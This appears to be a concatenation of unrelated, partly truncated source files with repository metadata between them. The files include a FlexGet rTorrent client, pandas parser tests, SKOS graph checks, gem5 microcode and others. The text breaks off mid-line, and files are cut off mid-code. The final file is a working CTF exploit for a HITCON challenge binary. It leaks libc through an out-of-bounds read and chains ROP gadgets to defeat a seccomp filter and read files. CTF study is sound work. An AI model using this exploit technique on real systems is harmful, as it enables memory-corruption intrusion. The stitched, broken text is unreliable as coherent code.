from __future__ import unicode_literals, division, absolute_import from builtins import * # noqa pylint: disable=unused-import, redefined-builtin from future.moves.xmlrpc import client as xmlrpc_client from future.moves.urllib.parse import urlparse, urljoin from future.utils import native_str import logging import os import socket import re from time import sleep from flexget.utils.template import RenderError from flexget.utils.pathscrub import pathscrub from flexget import plugin from flexget.event import event from flexget.entry import Entry from flexget.config_schema import one_or_more from flexget.utils.bittorrent import Torrent, is_torrent_file from requests.auth import HTTPDigestAuth, HTTPBasicAuth log = logging.getLogger('rtorrent') class _Method(object): # some magic to bind an XML-RPC method to an RPC server. # supports "nested" methods (e.g. examples.getStateName) def __init__(self, send, name): self.__send = send self.__name = name def __getattr__(self, name): return _Method(self.__send, "%s.%s" % (self.__name, name)) def __call__(self, *args): return self.__send(self.__name, args) class HTTPDigestTransport(xmlrpc_client.Transport): """ Transport that uses requests to support Digest authentication. """ def __init__(self, scheme, digest_auth, username, password, session, *args, **kwargs): self.__scheme = scheme self.__session = session self.__digest_auth = digest_auth self.__username = username self.__password = password self.verbose = 0 xmlrpc_client.Transport.__init__(self, *args, **kwargs) # old style class def request(self, host, handler, request_body, verbose=False): return self.single_request(host, handler, request_body, verbose) def single_request(self, host, handler, request_body, verbose=0): url = urljoin('{0}://{1}'.format(self.__scheme, host), handler) auth = self.get_auth() response = self.send_request(url, auth, request_body) # if status code is 401, it means we used the wrong auth method if response.status_code == 401: log.warning('%s auth failed. Retrying with %s. Please change your config.', 'Digest' if self.__digest_auth else 'Basic', 'Basic' if self.__digest_auth else 'Digest') self.__digest_auth = not self.__digest_auth auth = self.get_auth() response = self.send_request(url, auth, request_body) response.raise_for_status() return self.parse_response(response) def get_auth(self): if self.__digest_auth: return HTTPDigestAuth(self.__username, self.__password) return HTTPBasicAuth(self.__username, self.__password) def send_request(self, url, auth, data): return self.__session.post(url, auth=auth, data=data, raise_status=False) def parse_response(self, response): p, u = self.getparser() if self.verbose: log.info('body: %s', repr(response)) p.feed(response.content) p.close() return u.close() class SCGITra
nsport(xmlrpc_client.Transport): """ Used to override the default xmlrpclib transport to support SCGI """ def __init__(self, *args, **kwargs): self.verbose = 0 xmlrpc_client.Transport.__init__(self, *args, **kwargs) def request(self, host, handler, requ
est_body, verbose=False): return self.single_request(host, handler, request_body, verbose) def single_request(self, host, handler, request_body, verbose=0): # Add SCGI headers to the request. headers = [('CONTENT_LENGTH', native_str(len(request_body))), ('SCGI', '1')] header = '\x00'.join(['%s\x00%s' % (key, value) for key, value in headers]) + '\x00' header = '%d:%s' % (len(header), header) request_body = '%s,%s' % (header, request_body) sock = None try: if host: parsed_host = urlparse(host) host = parsed_host.hostname port = parsed_host.port addr_info = socket.getaddrinfo(host, port, socket.AF_INET, socket.SOCK_STREAM) sock = socket.socket(*addr_info[0][:3]) sock.connect(addr_info[0][4]) else: sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) sock.connect(handler) self.verbose = verbose sock.sendall(request_body.encode()) return self.parse_response(sock.makefile()) finally: if sock: sock.close() def parse_response(self, response): p, u = self.getparser() response_body = '' while True: data = response.read(1024) if not data: break response_body += data if self.verbose: log.info('body: %s', repr(response_body)) # Remove SCGI headers from the response. _, response_body = re.split(r'\n\s*?\n', response_body, maxsplit=1) p.feed(response_body) p.close() return u.close() class SCGIServerProxy(object): """ Enable connection to SCGI proxy """ def __init__(self, uri, transport=None, encoding=None, verbose=False, allow_none=False, use_datetime=False): parsed_url = urlparse(uri) self.__host = uri if parsed_url.scheme else None self.__handler = parsed_url.path if not self.__handler: self.__handler = '/' if not transport: transport = SCGITransport(use_datetime=use_datetime) self.__transport = transport self.__encoding = encoding or 'utf-8' self.__verbose = verbose self.__allow_none = allow_none def __close(self): self.__transport.close() def __request(self, method_name, params): # call a method on the remote server request = xmlrpc_client.dumps(params, method_name, encoding=self.__encoding, allow_none=self.__allow_none).encode(self.__encoding) response = self.__transport.request( self.__host, self.__handler, request.decode('utf-8'), verbose=self.__verbose ) if len(response) == 1: response = response[0] return response def __repr__(self): return ( "<ServerProxy for %s%s>" % (self.__host, self.__handler) ) __str__ = __repr__ def __getattr__(self, name): # magic method dispatcher return _Method(self.__request, name) # note: to call a remote object with an non-standard name, use # result getattr(server, "strange-python-name")(args) def __call__(self, attr): """A workaround to get special attributes on the ServerProxy without interfering with the magic __getattr__ """ if attr == "close": return self.__close elif attr == "transport": return self.__transport raise AttributeError("Attribute %r not found" % (attr,)) class RTorrent(object): """ rTorrent API client """ default_fields = ( 'hash', 'name', 'up_total', 'down_total', 'down_rate', 'is_open', 'is_active', 'custom1', 'custom2', 'custom3', 'custom4', 'custom5', 'state', 'complete', 'bytes_done', 'down.rate', 'left_bytes', 'ratio', 'base_path', 'load_date' ) required_fields = ( 'hash', 'name', 'base_path' ) def __init__(self, uri, username=None, password=None, digest_auth=None, session=None): """ New connection to rTorrent :param uri: RTorrent URL. Supports both http(s) and scgi :param username: Username for basic auth over http(s) :param password: Password for basic auth over http(s) """ self.uri = uri self.username = username self.password = password self.digest_auth = digest_auth
rs2/pandas
pandas/tests/io/parser/test_python_parser_only.py
Python
bsd-3-clause
9,378
0.000746
""" Tests that apply specifically to the Python parser. Unless specifically stated as a Python-specific issue, the goal is to eventually move as many of these tests out of this module as soon as the C parser can accept further arguments when parsing. """ import csv from io import ( BytesIO, StringIO, ) import pytest from pandas.errors import ParserError from pandas import ( DataFrame, Index, MultiIndex, ) import pandas._testing as tm def test_default_separator(python_parser_only): # see gh-17333 # # csv.Sniffer in Python treats "o" as separator. data = "aob\n1o2\n3o4" parser = python_parser_only expected = DataFrame({"a": [1, 3], "b": [2, 4]}) result = parser.read_csv(StringIO(data), sep=None) tm.assert_frame_equal(result, expected) @pytest.mark.parametrize("skipfooter", ["foo", 1.5, True]) def test_invalid_skipfooter_non_int(python_parser_only, skipfooter): # see gh-15925 (comment) data = "a\n1\n2" parser = python_parser_only msg = "skipfooter must be an integer" with pytest.raises(ValueError, match=msg): parser.read_csv(StringIO(data), skipfooter=skipfooter) def test_invalid_skipfooter_negative(python_parser_only): # see gh-15925 (comment) data = "a\n1\n2" parser = python_parser_only msg = "skipfooter cannot be negative" with pytest.raises(ValueError, match=msg): parser.read_csv(StringIO(data), skipfooter=-1) @pytest.mark.parametrize("kwargs", [{"sep": None}, {"delimiter": "|"}]) def test_sniff_delimiter(python_parser_only, kwargs): data = """index|A|B|C foo|1|2|3 bar|4|5|6 baz|7|8|9 ""
" parser = pyt
hon_parser_only result = parser.read_csv(StringIO(data), index_col=0, **kwargs) expected = DataFrame( [[1, 2, 3], [4, 5, 6], [7, 8, 9]], columns=["A", "B", "C"], index=Index(["foo", "bar", "baz"], name="index"), ) tm.assert_frame_equal(result, expected) def test_sniff_delimiter_comment(python_parser_only): data = """# comment line index|A|B|C # comment line foo|1|2|3 # ignore | this bar|4|5|6 baz|7|8|9 """ parser = python_parser_only result = parser.read_csv(StringIO(data), index_col=0, sep=None, comment="#") expected = DataFrame( [[1, 2, 3], [4, 5, 6], [7, 8, 9]], columns=["A", "B", "C"], index=Index(["foo", "bar", "baz"], name="index"), ) tm.assert_frame_equal(result, expected) @pytest.mark.parametrize("encoding", [None, "utf-8"]) def test_sniff_delimiter_encoding(python_parser_only, encoding): parser = python_parser_only data = """ignore this ignore this too index|A|B|C foo|1|2|3 bar|4|5|6 baz|7|8|9 """ if encoding is not None: from io import TextIOWrapper data = data.encode(encoding) data = BytesIO(data) data = TextIOWrapper(data, encoding=encoding) else: data = StringIO(data) result = parser.read_csv(data, index_col=0, sep=None, skiprows=2, encoding=encoding) expected = DataFrame( [[1, 2, 3], [4, 5, 6], [7, 8, 9]], columns=["A", "B", "C"], index=Index(["foo", "bar", "baz"], name="index"), ) tm.assert_frame_equal(result, expected) def test_single_line(python_parser_only): # see gh-6607: sniff separator parser = python_parser_only result = parser.read_csv(StringIO("1,2"), names=["a", "b"], header=None, sep=None) expected = DataFrame({"a": [1], "b": [2]}) tm.assert_frame_equal(result, expected) @pytest.mark.parametrize("kwargs", [{"skipfooter": 2}, {"nrows": 3}]) def test_skipfooter(python_parser_only, kwargs): # see gh-6607 data = """A,B,C 1,2,3 4,5,6 7,8,9 want to skip this also also skip this """ parser = python_parser_only result = parser.read_csv(StringIO(data), **kwargs) expected = DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]], columns=["A", "B", "C"]) tm.assert_frame_equal(result, expected) @pytest.mark.parametrize( "compression,klass", [("gzip", "GzipFile"), ("bz2", "BZ2File")] ) def test_decompression_regex_sep(python_parser_only, csv1, compression, klass): # see gh-6607 parser = python_parser_only with open(csv1, "rb") as f: data = f.read() data = data.replace(b",", b"::") expected = parser.read_csv(csv1) module = pytest.importorskip(compression) klass = getattr(module, klass) with tm.ensure_clean() as path: tmp = klass(path, mode="wb") tmp.write(data) tmp.close() result = parser.read_csv(path, sep="::", compression=compression) tm.assert_frame_equal(result, expected) def test_read_csv_buglet_4x_multi_index(python_parser_only): # see gh-6607 data = """ A B C D E one two three four a b 10.0032 5 -0.5109 -2.3358 -0.4645 0.05076 0.3640 a q 20 4 0.4473 1.4152 0.2834 1.00661 0.1744 x q 30 3 -0.6662 -0.5243 -0.3580 0.89145 2.5838""" parser = python_parser_only expected = DataFrame( [ [-0.5109, -2.3358, -0.4645, 0.05076, 0.3640], [0.4473, 1.4152, 0.2834, 1.00661, 0.1744], [-0.6662, -0.5243, -0.3580, 0.89145, 2.5838], ], columns=["A", "B", "C", "D", "E"], index=MultiIndex.from_tuples( [("a", "b", 10.0032, 5), ("a", "q", 20, 4), ("x", "q", 30, 3)], names=["one", "two", "three", "four"], ), ) result = parser.read_csv(StringIO(data), sep=r"\s+") tm.assert_frame_equal(result, expected) def test_read_csv_buglet_4x_multi_index2(python_parser_only): # see gh-6893 data = " A B C\na b c\n1 3 7 0 3 6\n3 1 4 1 5 9" parser = python_parser_only expected = DataFrame.from_records( [(1, 3, 7, 0, 3, 6), (3, 1, 4, 1, 5, 9)], columns=list("abcABC"), index=list("abc"), ) result = parser.read_csv(StringIO(data), sep=r"\s+") tm.assert_frame_equal(result, expected) @pytest.mark.parametrize("add_footer", [True, False]) def test_skipfooter_with_decimal(python_parser_only, add_footer): # see gh-6971 data = "1#2\n3#4" parser = python_parser_only expected = DataFrame({"a": [1.2, 3.4]}) if add_footer: # The stray footer line should not mess with the # casting of the first two lines if we skip it. kwargs = {"skipfooter": 1} data += "\nFooter" else: kwargs = {} result = parser.read_csv(StringIO(data), names=["a"], decimal="#", **kwargs) tm.assert_frame_equal(result, expected) @pytest.mark.parametrize( "sep", ["::", "#####", "!!!", "123", "#1!c5", "%!c!d", "@@#4:2", "_!pd#_"] ) @pytest.mark.parametrize( "encoding", ["utf-16", "utf-16-be", "utf-16-le", "utf-32", "cp037"] ) def test_encoding_non_utf8_multichar_sep(python_parser_only, sep, encoding): # see gh-3404 expected = DataFrame({"a": [1], "b": [2]}) parser = python_parser_only data = "1" + sep + "2" encoded_data = data.encode(encoding) result = parser.read_csv( BytesIO(encoded_data), sep=sep, names=["a", "b"], encoding=encoding ) tm.assert_frame_equal(result, expected) @pytest.mark.parametrize("quoting", [csv.QUOTE_MINIMAL, csv.QUOTE_NONE]) def test_multi_char_sep_quotes(python_parser_only, quoting): # see gh-13374 kwargs = {"sep": ",,"} parser = python_parser_only data = 'a,,b\n1,,a\n2,,"2,,b"' if quoting == csv.QUOTE_NONE: msg = "Expected 2 fields in line 3, saw 3" with pytest.raises(ParserError, match=msg): parser.read_csv(StringIO(data), quoting=quoting, **kwargs) else: msg = "ignored when a multi-char delimiter is used" with pytest.raises(ParserError, match=msg): parser.read_csv(StringIO(data), quoting=quoting, **kwargs) def test_none_delimiter(python_parser_only, capsys): # see gh-13374 and gh-17465 parser = python_parser_only data = "a,b,c\n0,1,2\n3,4,5,6\n7,8,9" expected = DataFrame({"a": [0, 7], "b": [1, 8], "c": [2, 9]}) # We expect the third line in the data to be # skipped because it is malformed, but we do # not expect any e
dit/dit
dit/pid/measures/iskar.py
Python
bsd-3-clause
4,845
0.001032
""" The I_downarrow unique measure, proposed by Griffith et al, and shown to be inconsistent. The idea is to measure unique information as the intrinsic mutual information between and source and the target, given the other sources. It turns out that these unique values are inconsistent, in that they produce differing redundancy values. """ from ..pid import BaseUniquePID from ...multivariate.secret_key_agreement import ( no_communication_skar, one_way_skar, two_way_skar, ) from ...utils import flatten __all__ = ( 'PID_SKAR_nw', 'PID_SKAR_owa', 'PID_SKAR_owb', 'PID_SKAR_tw', ) class PID_SKAR_nw(BaseUniquePID): """ The two-way secret key agreement rate partial information decomposition. Notes ----- This method progressively utilizes better bounds on the SKAR, and if even when using the tightest bounds does not result in a singular SKAR, nan is returned. """ _name = "I_>-<" @staticmethod def _measure(d, sources, target, niter=25, bound=None): """ This computes unique information as S(X_0 >-< Y || X_1). Parameters ---------- d : Distribution The distribution to compute I_SKAR for. sources : iterable of iterables The source variables. target : iterable The target variable. Returns ------- i_skar_nw : dict The value of I_SKAR_nw for each individual source. """ uniques = {} for source in sources: others = list(sources) others.remove(source) others = list(flatten(others)) uniques[source] = no_communication_skar(d, source, target, others) return uniques class PID_SKAR_owa(BaseUniquePID): """ The one-way secret key agreement rate partial information decomposition, source to target. """ _name = "I_>->" @staticmethod def _measure(d, sources, target, niter=25, bound=None): """ This computes unique information as S(X_0 >-> Y || X_1). Parameters ---------- d : Distribution The distribution to compute I_SKAR for. sources : iterable of iterables The source variables. target : iterable The target variable. Returns ------- i_skar_owa : dict The value of I_SKAR_owa for each individual source. """ uniques = {} for source in sources: others = list(sources) others.remove(source) others = list(flatten(others)) uniques[source] = one_way_skar(d, source, target, others) return uniques class PID_SKAR_owb(BaseUniquePID): """ The one-way secret key agreement rate partial information decomposition, target to source. """ _name = "I_<-<" @staticmethod def _measure(d, sources, target, niter=25, bound=None): """ This computes unique information as S(X_0 <-< Y || X_1). Parameters ---------
- d : Distribution The distribution to compute I_SKAR for. sources : iterable
of iterables The source variables. target : iterable The target variable. Returns ------- i_skar_owb : dict The value of I_SKAR_owb for each individual source. """ uniques = {} for source in sources: others = list(sources) others.remove(source) others = list(flatten(others)) uniques[source] = one_way_skar(d, target, source, others) return uniques class PID_SKAR_tw(BaseUniquePID): """ The two-way secret key agreement rate partial information decomposition. Notes ----- This method progressively utilizes better bounds on the SKAR, and if even when using the tightest bounds does not result in a singular SKAR, nan is returned. """ _name = "I_<->" @staticmethod def _measure(d, sources, target, niter=25, bound=None): """ This computes unique information as S(X_0 <-> Y || X_1), when possible. Parameters ---------- d : Distribution The distribution to compute I_SKAR for. sources : iterable of iterables The source variables. target : iterable The target variable. Returns ------- i_skar_tw : dict The value of I_SKAR_tw for each individual source. """ uniques = {} for source in sources: others = list(sources) others.remove(source) others = list(flatten(others)) uniques[source] = two_way_skar(d, [source, target], others) return uniques
scholer/cadnano2.5
cadnano/tests/functionaltest_gui.py
Python
mit
1,997
0.001502
# To run: # pytest -c cadnano/tests/pytestgui.ini cadnano/tests/ import pytest from PyQt5.QtCore import Qt, QPointF from PyQt5.QtTest import QTest from cadnano.fileio.lattice import HoneycombDnaPart from cadnano.views.sliceview import slicestyles from cnguitestcase import GUITestApp @pytest.fixture() def cnapp(): app = GUITestApp() yield app app.tearDown() DELAY = 5 # milliseconds RADIUS = slicestyles.SLICE_HELIX_RADIUS ####################### Standard Functional Tests ######################## def testCreateVirtualHelixGui(cnapp): """Create some VHs""" # Create a new Honeycomb part toolbar = cnapp.window.main_toolbar action_new_honeycomb = toolbar.widgetForAction(cnapp.window.action_new_dnapart_honeycomb) QTest.mouseClick(action_new_honeycomb, Qt.LeftButton, delay=DELAY) slicerootitem = cnapp.window.views['slice'].root_item assert len(slicerootitem.instance_items) == 1 slice_part_item = list(slicerootitem.instance_items.values())[0] QTest.keyClick(cnapp.window, Qt.Key_H, delay=DELAY) QTest.keyClick(cnapp.window, Qt.Key_C, delay=DELAY) cnapp.processEvents() cmd_count = 1 # already added the part for row in range(-2, 2): for col in range(-2, 2): # print(row
, col) x, y = HoneycombDnaPart.latticeCoordToModelXY(RADIUS, row, col) pt = QPointF(x, y) cnapp.graphicsI
temClick(slice_part_item, Qt.LeftButton, pos=pt, delay=DELAY) cmd_count += 1 cnapp.processEvents() vh_count = len(cnapp.document.activePart().getidNums()) # undo and redo all for i in range(cmd_count): cnapp.document.undoStack().undo() cnapp.processEvents() for i in range(cmd_count): cnapp.document.undoStack().redo() cnapp.processEvents() part = list(cnapp.document.children())[0] vh_count_after_redo = len(part.getidNums()) assert vh_count == vh_count_after_redo # import time # time.sleep(3) # end def
aferr/LatticeMemCtl
src/arch/x86/isa/insts/general_purpose/control_transfer/xreturn.py
Python
bsd-3-clause
3,641
0
# Copyright (c) 2007-2008 The Hewlett-Packard Development Company # All rights reserved. # # The license below extends only to copyright in the software and shall # not be construed as granting a license to any other intellectual # property including but not limited to intellectual property relating # to a hardware implementation of the functionality of the software # licensed hereunder. You may use the software subject to the license # terms below provided that you ensure that this notice is replicated # unmodified and in its entirety in all distributions of the software, # modified or unmodified, in source code or in binary form. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer; # redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution; # neither the name of the copyright holders nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, O
R TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # Authors: Gabe Black microcode = ''' def macroop RET_NEAR { # Make the default data size of rets 64 bits in 64 bit mode .adjust_env oszIn64Override ld t1, ss, [1, t0, rsp] # Check address of return addi rsp, rsp, dsz wripi t1, 0 }; def macroop RET_NEAR_I { # Make the default data size of rets 64 bits in 64 bit mode .adjust_env oszIn64Override limm t2, imm ld t1, ss, [1, t0, rsp] # Check address of return addi rsp, rsp, dsz add rsp, rsp, t2 wripi t1, 0 }; def macroop RET_FAR { .adjust_env oszIn64Override # Get the return RIP ld t1, ss, [1, t0, rsp] # Get the return CS ld t2, ss, [1, t0, rsp], ssz # Get the rpl andi t3, t2, 0x3 # Get the cpl # Here we'd check if we're changing priviledge levels. We'll just hope # that doesn't happen yet. # Do stuff if they're equal andi t0, t2, 0xFC, flags=(EZF,), dataSize=2 br label("processDescriptor"), flags=(CEZF,) andi t3, t2, 0xF8, dataSize=8 andi t0, t2, 0x4, flags=(EZF,), dataSize=2 br label("globalDescriptor"), flags=(CEZF,) ld t3, tsl, [1, t0, t3], dataSize=8 br label("processDescriptor") globalDescriptor: ld t3, tsg, [1, t0, t3], dataSize=8 processDescriptor: chks t2, t3, IretCheck, dataSize=8 # There should be validity checks on the RIP checks here, but I'll do # that later. wrdl cs, t3, t2 wrsel cs, t2 wrip t0, t1 br label("end") # Do other stuff if they're not. end: fault "NoFault" }; '''
veloutin/plow
plow/tests/test_dn_compare.py
Python
lgpl-3.0
1,458
0.003429
import unittest from plow.ldapadaptor import LdapAdaptor class FakeLA(LdapAdaptor): def bind(self, *args): """ Nothing to see here move along """ initialize = bind class Test_Ldap_DN_Compare(unittest.TestCase): def setUp(self): self.ldap_case_i = FakeLA("uri", "base", case_insensitive_dn=True) self.ldap_case_s = FakeLA("uri", "base") def _do_compare(self, ref, other, res, case_sensitive=True): if case_sensitive: match = self.ldap_case_s.compare_dn(ref, other) else: match = self.ldap_case_i.compare_dn(ref, other) if res: self.assertTrue( match, "Expected '{0}' to match '{1}' (Case Sensitive: {2})".format(ref, other, case_sensitive), ) else: self.assertFalse( match, "'{0}' and '{1}' should not match (Case Sensitive: {2})".format(ref, other, case_sensitive), ) def test_basic(self): self._do_compare("CN=Test", "CN=test", False, case_sensitive=True) self._do_compare("CN=Test", "CN=test", True, case_sensitive=False) def test_spaces(self): self._do_comp
are("CN=Test, OU=Base", "CN=Test,OU=Base", True) self._do_compare(" CN = Test,OU = Base ", "CN=Test,OU=Base", True) self._do_compare(" CN = Te st ", "CN=Te
st", True) if __name__ == '__main__': unittest.main()
Sumukh/ParallelRF
mnist.py
Python
gpl-3.0
959
0.01147
# Script used to create Mnist_mini and Mnist_full datasets. import numpy as np from sklearn.datasets import fetch_mldata from pandas import DataFrame # Default download location for caching is # ~/scikit_learn_da
ta/mldata/mnist-original.mat unless specified otherwise. mnist = fetch_mldata('MNIST original') # Create DataFrame, group data by class. df = DataFrame(mnist.data) df['class'] = mnist.target grouped = df.groupby('class') # Write data feature values to file in Dataset d
irectory by class. for name, group in grouped: # Create mini binary MNIST classification dataset for faster testing. if int(name) < 2: fname = 'Dataset/Mnist_mini/Class' + str(int(name)) + '.txt' np.savetxt(fname=fname, X=group[:200], fmt='%d',delimiter='\t',newline='\n') # Create full MNIST classification for full application. fname = 'Dataset/Mnist_full/Class' + str(int(name)) + '.txt' np.savetxt(fname=fname, X=group, fmt='%d', delimiter='\t', newline='\n')
NatLibFi/Skosify
skosify/check.py
Python
mit
8,938
0.000224
# -*- coding: utf-8 -*- """Checks/fixes are bundled in one namespace.""" import logging from rdflib.namespace import RDF, SKOS from .rdftools.namespace import SKOSEXT from .rdftools import localname, find_prop_overlap def _hierarchy_cycles_visit(rdf, node, parent, break_cycles, status): if status.get(node) is None: status[node] = 1 # entered for child in sorted(rdf.subjects(SKOS.broader, node)): _hierarchy_cycles_visit( rdf, child, node, break_cycles, status) status[node] = 2 # set this node as completed elif status.get(node) == 1: # has been entered but not yet done if break_cycles: logging.warning("Hierarchy cycle removed at %s -> %s", localname(parent), localname(node)) rdf.remove((node, SKOS.broader, parent)) rdf.remove((node, SKOS.broaderTransitive, parent)) rdf.remove((node, SKOSEXT.broaderGeneric, parent)) rdf.remove((node, SKOSEXT.broaderPartitive, parent)) rdf.remove((parent, SKOS.narrower, node)) rdf.remove((parent, SKOS.narrowerTransitive, node)) else: logging.warning( "Hierarchy cycle detected at %s -> %s, " "but not removed because break_cycles is not active", localname(parent), localname(node)) elif status.get(node) == 2: # is completed already pass def hierarchy_cycles(rdf, fix=False): """Check if the graph contains skos:broader cycles and optionally break these. :param Graph rdf: An rdflib.graph.Graph object. :param bool fix: Fix the problem by removing any skos:broader that overlaps with skos:broaderTransitive. """ top_concepts = sorted(rdf.subject_objects(SKOS.hasTopConcept)) status = {} for cs, root in top_concepts: _hierarchy_cycles_visit( rdf, root, None, fix, status=status) # double check that all concepts were actually visited in the search, # and visit remaining ones if necessary recheck_top_concepts = False for conc in sorted(rdf.subjects(RDF.type, SKOS.Concept)): if conc not in status: recheck_top_concepts = True _hierarchy_cycles_visit( rdf, conc, None, fix, status=status) return recheck_top_concepts def disjoint_relations(rdf, fix=False): """Check if the graph contains concepts connected by both of the semantically disjoint semantic skos:related and skos:broaderTransitive (S27), and optionally remove the involved skos:related relations. :param Graph rdf: An rdflib.graph.Graph object. :param bool fix: Fix the problem by removing skos:related relations that overlap with skos:broaderTransitive. """ for conc1, conc2 in sorted(rdf.subject
_objects(SKOS.related)): if conc2 in sorted(rdf.transitive_objects(conc1, SKOS.broader)): if fix: logging.warning( "Concepts %s and %s connected by both " "skos:broaderTransitive and skos:related, " "removing skos:related", conc1, conc2) rdf.remove((conc1, SKOS
.related, conc2)) rdf.remove((conc2, SKOS.related, conc1)) else: logging.warning( "Concepts %s and %s connected by both " "skos:broaderTransitive and skos:related, " "but keeping it because keep_related is enabled", conc1, conc2) def hierarchical_redundancy(rdf, fix=False): """Check for and optionally remove extraneous skos:broader relations. :param Graph rdf: An rdflib.graph.Graph object. :param bool fix: Fix the problem by removing skos:broader relations between concepts that are otherwise connected by skos:broaderTransitive. """ for conc, parent1 in sorted(rdf.subject_objects(SKOS.broader)): for parent2 in sorted(rdf.objects(conc, SKOS.broader)): if parent1 == parent2: continue # must be different if parent2 in rdf.transitive_objects(parent1, SKOS.broader): if fix: logging.warning( "Eliminating redundant hierarchical relationship: " "%s skos:broader %s", conc, parent2) rdf.remove((conc, SKOS.broader, parent2)) rdf.remove((conc, SKOS.broaderTransitive, parent2)) rdf.remove((parent2, SKOS.narrower, conc)) rdf.remove((parent2, SKOS.narrowerTransitive, conc)) else: logging.warning( "Redundant hierarchical relationship " "%s skos:broader %s found, but not eliminated " "because eliminate_redundancy is not set", conc, parent2) def preflabel_uniqueness(rdf, policy='all'): """Check that concepts have no more than one value of skos:prefLabel per language tag (S14), and optionally move additional values to skos:altLabel. :param Graph rdf: An rdflib.graph.Graph object. :param str policy: Policy for deciding which value to keep as prefLabel when multiple prefLabels are found. Possible values are 'shortest' (keep the shortest label), 'longest' (keep the longest label), 'uppercase' (prefer uppercase), 'lowercase' (prefer uppercase) or 'all' (keep all, just log the problems). Alternatively, a list of policies to apply in order, such as ['shortest', 'lowercase'], may be used. """ resources = set( (res for res, label in rdf.subject_objects(SKOS.prefLabel))) policy_fn = { 'shortest': len, 'longest': lambda x: -len(x), 'uppercase': lambda x: int(x[0].islower()), 'lowercase': lambda x: int(x[0].isupper()) } if type(policy) not in (list, tuple): policies = policy.split(',') else: policies = policy for p in policies: if p not in policy_fn: logging.critical("Unknown preflabel-policy: %s", policy) return def key_fn(label): return [policy_fn[p](label) for p in policies] + [str(label)] for res in sorted(resources): prefLabels = {} for label in rdf.objects(res, SKOS.prefLabel): lang = label.language if lang not in prefLabels: prefLabels[lang] = [] prefLabels[lang].append(label) for lang, labels in prefLabels.items(): if len(labels) > 1: if policies[0] == 'all': logging.warning( "Resource %s has more than one prefLabel@%s, " "but keeping all of them due to preflabel-policy=all.", res, lang) continue chosen = sorted(labels, key=key_fn)[0] logging.warning( "Resource %s has more than one prefLabel@%s: " "choosing %s (policy: %s)", res, lang, chosen, str(policy)) for label in labels: if label != chosen: rdf.remove((res, SKOS.prefLabel, label)) rdf.add((res, SKOS.altLabel, label)) def label_overlap(rdf, fix=False): """Check if concepts have the same value for any two of the pairwise disjoint properties skos:prefLabel, skos:altLabel and skos:hiddenLabel (S13), and optionally remove the least significant property. :param Graph rdf: An rdflib.graph.Graph object. :param bool fix: Fix the problem by removing the least significant property (altLabel or hiddenLabel). """ def label_warning(res, label, keep, remove): if fix: logging.warning( "Resource %s has '%s'@%s as both %s and %s; removing %s", res, label, label.language, keep, remove, remove ) else: logging.warning(
integeruser/on-pwning
2017-hitcon-quals/Impeccable-Artifact/artifact.py
Python
mit
3,733
0.001072
#!/usr/bin/env python2 # -*- coding: utf-8 -*- from pwn import * context(arch='amd64', os='linux', aslr=False, terminal=['tmux', 'neww']) env = {'LD_PRELOAD': './libc.so.6'} if args['GDB']: io = gdb.debug( './artifact-amd64-2.24-9ubuntu2.2', env=env, gdbscript='''\ set follow-fork-mode parent b *0x555555554ba6 c ''') elf, libc = io.elf,
ELF('libs/amd64/2.24/9ubuntu2.2/libc-2.24.so') elif args['REMOTE']: io = remote('52.192.178.153', 31337) elf, libc = ELF('./artifact'), ELF('libs/amd64/2.24/9ubuntu2.2/libc-2.24.so') else: io = process('./artifact-amd64-2.24-9ubuntu2.2', env=env) elf, libc = io.elf, ELF('libs/amd64/2.24/9ubuntu2.2/libc-2.24.so') # the binary allows reading and writing to arbitrary locations # the tricky part was
finding how to bypass the seccomp rules # enforced with prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, ...), since # the "official" tool to disassemble BPF bytecode provided by libseccomp doesn't handle # the BPF_X opcode correctly (and shows wrong rules) # luckily, https://github.com/niklasb/dump-seccomp seems to extract the correct rules: # prctl(PR_SET_NO_NEW_PRIVS) # prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, ...) # fprog @ 00007fffffffdd70 # 20 blocks @ 00007fffffffdd80 # Disassembly: # l0: ld [4] # l1: jeq #0xc000003e, l2, l18 # l2: ld [32] # l3: tax # l4: ld [0] # l5: jeq #0, l19, l6 # l6: jeq #0x1, l19, l7 # l7: jeq #0x5, l19, l8 # l8: jeq #0x8, l19, l9 # l9: jeq #0x9, l11, l10 # l10: jeq #0xa, l11, l14 # l11: txa # l12: and #0x1 # l13: jeq #0x1, l18, l19 # l14: jeq x, l19, l15 # l15: jeq #0xc, l19, l16 # l16: jeq #0x3c, l19, l17 # l17: jeq #0xe7, l19, l18 # l18: ret #0 # l19: ret #0x7fff0000 # at l14, syscalls in which rax == rdx are allowed to run: this means # we can execute open(..., ..., 2) # find the address of libc io.recvuntil('Choice?\n') io.sendline('1') io.recvuntil('Idx?\n') index = 0x650 / 8 + 1 io.sendline(str(index)) a_libc_address = int(io.recvline()[len('Here it is: '):]) libc.address = a_libc_address - 0x0000000000020300 - 241 success('libc.address: %s' % hex(libc.address)) # find any writeable location buf = libc.address + 0x3c1800 # read a filename into buf, open the file, read its content and write it back rop = ROP(libc) rop.read(0, buf, 5) rop.open(buf, 0, 2) rop.read(3, buf, 50) rop.write(1, buf, 